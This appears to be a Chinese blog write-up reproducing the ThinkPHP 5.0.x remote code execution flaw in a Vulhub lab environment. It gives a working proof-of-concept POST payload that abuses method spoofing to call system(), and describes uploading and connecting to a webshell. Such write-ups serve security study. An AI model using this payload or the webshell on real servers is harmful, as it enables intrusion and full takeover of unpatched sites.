![349eb4f6ef7c3600dd84547e90a50b2c.png](https://i-blog.csdnimg.cn/blog_migrate/59a80827f705dbec3538d1fd2dddc7b9.jpeg)
漏洞介绍
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源MVC框架,
简单来说就是Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php这个类可以处理http请求设置但此框架支持表单伪装变量,通过伪装变量实现任意函数的调用
影响版本
5.0全版本
复现环境
Vulhub漏洞靶场
vulhub-master/thinkphp/5.0.23-rce/
![14b227ac7765e2cd74f49fb5443e074e.png](https://i-blog.csdnimg.cn/blog_migrate/f676bd07be73a94a205d836ce22669d5.jpeg)
漏洞poc
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls
![72365cfa653d5a4aa70f6c9c559e8f0c.png](https://i-blog.csdnimg.cn/blog_migrate/f3031ca7bdeab4c99a82dcfe33ec59c0.jpeg)
验证漏洞之后使用exp可直接上传webshell(111.php)
上传之后找到上传的webshell
![46be2bd4d6de6ee43ed357110753091d.png](https://i-blog.csdnimg.cn/blog_migrate/051e3f167417cde1fe7c9d693965e307.jpeg)
由于正常上传后不能正常显示所以在上传的时候是经过base64 加密的所以在链接的时候选择base64加密传输
![1ddce4d28a67227835ed937f9f8e87dc.png](https://i-blog.csdnimg.cn/blog_migrate/77ca8fe49c2abe7c2774c4eea5f5e033.jpeg)
![f635acda7c3ac0deffaf1c7f6374f393.png](https://i-blog.csdnimg.cn/blog_migrate/769a7c70fdf9b4ef0fc0eaef7ffafb70.jpeg)